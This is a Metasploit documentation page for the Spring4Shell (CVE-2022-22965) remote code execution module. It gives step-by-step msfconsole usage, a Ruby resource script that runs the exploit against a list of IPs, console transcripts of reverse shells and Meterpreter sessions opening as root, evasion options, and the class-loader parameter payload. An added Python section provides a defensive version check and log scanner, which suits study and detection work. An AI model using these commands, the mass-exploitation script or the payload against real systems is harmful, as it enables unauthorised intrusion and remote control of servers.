Spring Framework Class property RCE (Spring4Shell) - Metasploit
This page contains detailed information about how to use the exploit/multi/http/spring_framework_rce_spring4shell Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Spring Framework Class property RCE (Spring4Shell)
Module: exploit/multi/http/spring_framework_rce_spring4shell
Source code: modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
Disclosure date: 2022-03-31
Last modification time: 2022-05-13 09:16:01 +0000
Supported architecture(s): -
Supported platform(s): Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-22965
This module is also known as Spring4Shell or SpringShell.
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Module leaves a payload or a dropper on the target machine.
Basic Usage
Using spring_framework_rce_spring4shell against a single host
Normally, you can use exploit/multi/http/spring_framework_rce_spring4shell this way:
msf > use exploit/multi/http/spring_framework_rce_spring4shell
msf exploit(spring_framework_rce_spring4shell) > show targets
... a list of targets ...
msf exploit(spring_framework_rce_spring4shell) > set TARGET target-id
msf exploit(spring_framework_rce_spring4shell) > show options
... show and set options ...
msf exploit(spring_framework_rce_spring4shell) > exploit
Using spring_framework_rce_spring4shell against multiple hosts
Since this is a remote exploit module, you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your spring_framework_rce_spring4shell will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following resource script. Note that you will probably need to modify the ip_list path and the payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |line|
  # Strip the trailing newline so it does not end up in the RHOST value
  ip = line.strip
  next if ip.empty?

  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/spring_framework_rce_spring4shell")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")
  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")
  run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
Finally, you should see the exploit being run against those hosts, similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.
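From the defender's side, as an added example that is not code from the Metasploit module or from this page: the Python below turns the four conditions in this description (Spring version window, JDK 9 or above, traditional WAR, standalone Tomcat) into a check, and scans web access-log lines for the class.module.classLoader property path that an exploit request carries (the module's ioc-in-logs side effect). The log lines are constructed samples, and the JDK, packaging and container values passed to the check are assumed to come from your own inventory.

```python
"""Defender-side triage for CVE-2022-22965 (Spring4Shell).

Added example; not code from the Metasploit module or from this page. It
turns the conditions in the description above into a check and scans web
access-log lines for the classLoader property path that the exploit
request carries. All log lines are constructed samples.
"""
import re
from urllib.parse import unquote

# Version windows named in the vulnerability description.
VULNERABLE_WINDOWS = (((5, 3, 0), (5, 3, 17)), ((5, 2, 0), (5, 2, 19)))


def parse_version(text):
    """'5.3.17.RELEASE' -> (5, 3, 17); a non-numeric qualifier ends parsing."""
    parts = []
    for piece in text.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    while len(parts) < 3:  # '5.3' is treated as 5.3.0
        parts.append(0)
    return tuple(parts)


def matches_vulnerable_conditions(spring_version, jdk_major, packaging, container):
    """True only when every condition from the description holds: Spring in a
    vulnerable window (or older than 5.2), JDK 9+, traditional WAR, Tomcat."""
    v = parse_version(spring_version)
    in_window = v < (5, 2, 0) or any(lo <= v <= hi for lo, hi in VULNERABLE_WINDOWS)
    return bool(in_window and jdk_major >= 9
                and packaging.lower() == "war" and container.lower() == "tomcat")


# Property path from the description, matched after URL decoding so that
# percent-encoded dots cannot hide it.
CLASSLOADER_PATH = re.compile(
    r"class\.module\.classLoader\.resources\.context\.parent\.pipeline\.first\.",
    re.IGNORECASE)
# A short random-named .jsp at the web root is what the module then executes
# (see "Executing JSP payload at .../S0J17.jsp" in the scenarios on this page).
ROOT_JSP = re.compile(r"^/[A-Za-z0-9]{1,12}\.jsp(?:\?|$)")
# Common/combined log format: host ident user [time] "METHOD target PROTO" ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')


def scan_access_log(lines):
    """Return (host, kind, decoded target) for each suspicious line.

    GET delivery puts the property path in the query string, so it is visible
    in the log directly. POST bodies are not logged, so for POST delivery the
    only trace here is the request for the dropped .jsp, reported as the weaker
    'root-jsp-request' signal for correlation with file-system artifacts.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(unquote(m.group("target")))  # undo double encoding too
        if CLASSLOADER_PATH.search(target):
            findings.append((m.group("host"), "classloader-property-path", target))
        elif ROOT_JSP.match(target):
            findings.append((m.group("host"), "root-jsp-request", target))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/May/2022:10:47:40 -0400] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 12',
    '10.0.0.5 - - [05/May/2022:10:47:41 -0400] "GET /?class%252Emodule%252EclassLoader%252Eresources%252Econtext%252Eparent%252Epipeline%252Efirst%252Esuffix=.jsp HTTP/1.1" 200 12',
    '10.0.0.9 - - [05/May/2022:10:48:00 -0400] "GET /helloworld/greeting?name=alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [05/May/2022:10:47:50 -0400] "GET /S0J17.jsp HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print(matches_vulnerable_conditions("5.3.17", 11, "war", "tomcat"))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```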
Verification Steps
- Build the application
git clone https://github.com/vleminator/Spring4Shell-POC
docker build . -t spring4shell
- Run the application
docker run -p 8085:8080 spring4shell
- Start msfconsole
- Run:
use exploit/multi/http/spring_framework_rce_spring4shell
- Set the RHOSTS, TARGET, PAYLOAD and payload-associated datastore options
- Run the exploit
Options
HTTP_METHOD
HTTP method to use for checking and exploitation. If set to Automatic (the default value), the method will be automatically identified. Automatically identifying the HTTP method uses the check method.
PAYLOAD_PATH
Path to write the payload. This is relative to the tomcat installation directory.
Scenarios
Target Java (vulhub container)
The target is the vulhub container which uses the GET HTTP method.
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name          Current Setting  Required  Description
----          ---------------  --------  -----------
HTTP_METHOD   Automatic        no        HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH  webapps/ROOT     yes       Path to write the payload
Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         8080             yes       The target port (TCP)
SSL           false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI     /                yes       The path to the application action
VHOST                          no        HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Java
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8080/
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: GET
[*] 192.168.159.128:8080 - Generating JSP...
[*] 192.168.159.128:8080 - Modifying Class Loader...
[*] 192.168.159.128:8080 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8080 - Executing JSP payload at http://192.168.159.128:8080/MUpts6425.jsp
[+] 192.168.159.128:8080 - Log file flushed
[*] Command shell session 1 opened (192.168.250.134:4444 -> 172.19.0.2:47418 ) at 2022-05-05 10:47:50 -0400
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat
Target Linux (x64)
The target is the vleminator container which uses the POST HTTP method.
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name          Current Setting                 Required  Description
----          ---------------                 --------  -----------
HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         8080                            yes       The target port (TCP)
SSL           false                           no        Negotiate SSL/TLS for outgoing connections
TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
VHOST                                         no        HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
1   Linux
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit http://192.168.159.128:8085/helloworld/greeting
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Automatically identified HTTP method: POST
[*] 192.168.159.128:8085 - Generating JSP...
[*] 192.168.159.128:8085 - Modifying Class Loader...
[*] 192.168.159.128:8085 - Waiting for the server to flush the logfile
[*] 192.168.159.128:8085 - Executing JSP payload at http://192.168.159.128:8085/S0J17.jsp
[+] 192.168.159.128:8085 - Log file flushed
[*] Sending stage (3020772 bytes) to 172.17.0.2
[+] Deleted /tmp/6DKA
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:54902 ) at 2022-05-05 10:52:35 -0400
meterpreter > getuid
Server username: root
meterpreter > pwd
/helloworld
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 11.2 (Linux 5.17.4-100.fc34.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Msfconsole Usage
Here is how the multi/http/spring_framework_rce_spring4shell exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/spring_framework_rce_spring4shell
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show info
Name: Spring Framework Class property RCE (Spring4Shell)
Module: exploit/multi/http/spring_framework_rce_spring4shell
Platform: Linux, Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2022-03-31
Provided by:
vleminator <vleminator[at]gmail.com>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Java
1 Linux
2 Windows
Check supported:
Yes
Basic options:
Name          Current Setting                 Required  Description
----          ---------------                 --------  -----------
HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         8080                            yes       The target port (TCP)
SSL           false                           no        Negotiate SSL/TLS for outgoing connections
TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
VHOST                                         no        HTTP server virtual host
Payload information:
Space: 5000
Description:
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and
older versions when running on JDK 9 or above and specifically
packaged as a traditional WAR and deployed in a standalone Tomcat
instance are vulnerable to remote code execution due to an unsafe
data binding used to populate an object from request parameters to
set a Tomcat specific ClassLoader. By crafting a request to the
application and referencing the
org.apache.catalina.valves.AccessLogValve class through the
classLoader with parameters such as the following:
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp,
an unauthenticated attacker can gain remote code execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-22965
https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://github.com/spring-projects/spring-framework/issues/28261
https://tanzu.vmware.com/security/cve-2022-22965
Also known as:
Spring4Shell
SpringShell
Module Options
This is a complete list of options available in the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options
Module options (exploit/multi/http/spring_framework_rce_spring4shell):
Name          Current Setting                 Required  Description
----          ---------------                 --------  -----------
HTTP_METHOD   Automatic                       no        HTTP method to use (Accepted: Automatic, GET, POST)
PAYLOAD_PATH  webapps/ROOT                    yes       Path to write the payload
Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT         8080                            yes       The target port (TCP)
SSL           false                           no        Negotiate SSL/TLS for outgoing connections
TARGETURI     /app/example/HelloWorld.action  yes       The path to the application action
VHOST                                         no        HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.0.126    yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Java
Advanced Options
Here is a complete list of advanced options supported by the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show advanced
Module advanced options (exploit/multi/http/spring_framework_rce_spring4shell):
Name                     Current Setting  Required  Description
----                     ---------------  --------  -----------
AllowNoCleanup           false            no        Allow exploitation without the possibility of cleaning up files
AutoCheck                true             no        Run check before exploit
ContextInformationFile                    no        The information file that contains context information
DOMAIN                   WORKSTATION      yes       The domain to use for Windows authentication
DigestAuthIIS            true             no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler    false            no        Disable the handler code for the selected payload
EXE::Custom                               no        Use custom exe instead of automatically generating a payload exe
EXE::EICAR               false            no        Generate an EICAR file instead of regular payload exe
EXE::FallBack            false            no        Use the default template in case the specified one is missing
EXE::Inject              false            no        Set to preserve the original EXE function
EXE::OldMethod           false            no        Set to use the substitution EXE generation method.
EXE::Path                                 no        The directory in which to look for the executable template
EXE::Template                             no        The executable template file name.
EnableContextEncoding    false            no        Use transient context when encoding payloads
FileDropperDelay                          no        Delay in seconds before attempting cleanup
FingerprintCheck         true             no        Conduct a pre-exploit fingerprint verification
ForceExploit             false            no        Override check result
HttpClientTimeout                         no        HTTP connection and receive timeout
HttpPassword                              no        The HTTP password to specify for authentication
HttpRawHeaders                            no        Path to ERB-templatized raw headers to append to existing headers
HttpTrace                false            no        Show the raw HTTP requests and responses
HttpTraceColors          red/blu          no        HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly     false            no        Show HTTP headers only in HttpTrace
HttpUsername                              no        The HTTP username to specify for authentication
MSI::Custom                               no        Use custom msi instead of automatically generating a payload msi
MSI::EICAR               false            no        Generate an EICAR file instead of regular payload msi
MSI::Path                                 no        The directory in which to look for the msi template
MSI::Template                             no        The msi template file name
MSI::UAC                 false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
SSLServerNameIndication                   no        SSL/TLS Server Name Indication (SNI)
SSLVersion               Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent                Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1  no        The User-Agent header to use for all requests
VERBOSE                  false            no        Enable detailed status messages
WORKSPACE                                 no        Specify the workspace for this module
WfsDelay                 2                no        Additional delay in seconds to wait for a session
WritableDir              /tmp             yes       A directory where we can write files
Payload advanced options (generic/shell_reverse_tcp):
Name                        Current Setting  Required  Description
----                        ---------------  --------  -----------
ARCH                                         no        The architecture that is being targeted
PLATFORM                                     no        The platform that is being targeted
ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
ReverseListenerComm                          no        The specific communication channel to use for this listener
ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
VERBOSE                     false            no        Enable detailed status messages
WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/spring_framework_rce_spring4shell module can exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show targets
Exploit targets:
Id Name
-- ----
0 Java
1 Linux
2 Windows
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/spring_framework_rce_spring4shell exploit:
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show payloads
Compatible Payloads
===================
#  Name                                Disclosure Date  Rank    Check  Description
-  ----                                ---------------  ----    -----  -----------
0  payload/generic/custom                               normal  No     Custom Payload
1  payload/generic/shell_bind_tcp                       normal  No     Generic Command Shell, Bind TCP Inline
2  payload/generic/shell_reverse_tcp                    normal  No     Generic Command Shell, Reverse TCP Inline
3  payload/generic/ssh/interact                         normal  No     Interact with Established SSH Connection
4  payload/java/jsp_shell_bind_tcp                      normal  No     Java JSP Command Shell, Bind TCP Inline
5  payload/java/jsp_shell_reverse_tcp                   normal  No     Java JSP Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/spring_framework_rce_spring4shell exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show evasion
Module evasion options:
Name                          Current Setting  Required  Description
----                          ---------------  --------  -----------
HTTP::header_folding          false            no        Enable folding of HTTP headers
HTTP::method_random_case      false            no        Use random casing for the HTTP method
HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Seems the payload hasn't been written
Here is a relevant code snippet related to the "Seems the payload hasn't been written" error message:
141: })
142:
143: res&.code == 200 && !res.body.blank?
144: end
145:
146: fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless succeeded
147:
148: print_good("#{peer} - Log file flushed")
149: end
150:
151: # Fix the JSP payload to make it valid once is dropped
Web server seems unresponsive
Here is a relevant code snippet related to the "Web server seems unresponsive" error message:
203: res = send_request_cgi(
204: 'method' => 'POST',
205: 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
206: )
207:
208: return CheckCode::Unknown('Web server seems unresponsive') unless res
209:
210: if res.headers.key?('Server')
211: res.headers['Server'].match(%r{(.*)/([\d|.]+)$})
212: else
213: res.body.match(%r{Apache\s(.*)/([\d|.]+)})
Application does not seem to be running under Tomcat
Here is a relevant code snippet related to the "Application does not seem to be running under Tomcat" error message:
214: end
215:
216: server = Regexp.last_match(1) || nil
217: version = Rex::Version.new(Regexp.last_match(2)) || nil
218:
219: return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)
220:
221: vprint_status("Detected #{server} #{version} running")
222:
223: if datastore['HTTP_METHOD'] == 'Automatic'
224: # prefer POST over get to keep the vars out of the query string if possible
Failed to automatically identify the HTTP method
Here is a relevant code snippet related to the "Failed to automatically identify the HTTP method" error message:
254: http_method = datastore['HTTP_METHOD']
255: if http_method == 'Automatic'
256: # if the check was skipped but we need to automatically identify the method, we have to run it here
257: @checkcode = check if @checkcode.nil?
258: http_method = @checkcode.details[:method]
259: fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?
260:
261: print_good("Automatically identified HTTP method: #{http_method}")
262: end
263:
264: # if the check method ran automatically, add a short delay before continuing with exploitation
<PEER> - No answer
Here is a relevant code snippet related to the "<PEER> - No answer" error message:
280: suffix: '.jsp',
281: file_date_format: date_format
282: }
283: res = modify_class_loader(http_method, properties)
284: unless res
285: fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
286: end
287:
288: # No matter what happened, try to 'restore' the Class Loader
289: properties = {
290: payload: '',
Related Pull Requests
- #16621 Merged Pull Request: Fix timeout of duplicated sessions
- #16622 Merged Pull Request: Bump Metasploit framework version to 6.2.0
- #16620 Merged Pull Request: Bump RubySMB, Add File Server Tool
- #16619 Merged Pull Request: fix of improper neighbor advertisement filtering in ipv6_neighbor.rb
- #16488 Merged Pull Request: Windows Task Scheduler Mixin & persistence_exe and vss_persistence module update
- #16413 Merged Pull Request: Multiple local exploit suggester enhancements
- #16610 Merged Pull Request: New, All-Inclusive PrintNightmare Exploit
- #16608 Merged Pull Request: Rename wiki files
References
- CVE-2022-22965
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
- https://github.com/spring-projects/spring-framework/issues/28261
- https://tanzu.vmware.com/security/cve-2022-22965
See Also
Check also the following modules related to this module:
- exploit/multi/http/spring_cloud_function_spel_injection
- exploit/linux/http/spring_cloud_gateway_rce
- auxiliary/scanner/http/springcloud_directory_traversal
- auxiliary/scanner/http/springcloud_traversal
- exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
Authors
- vleminator <vleminator[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.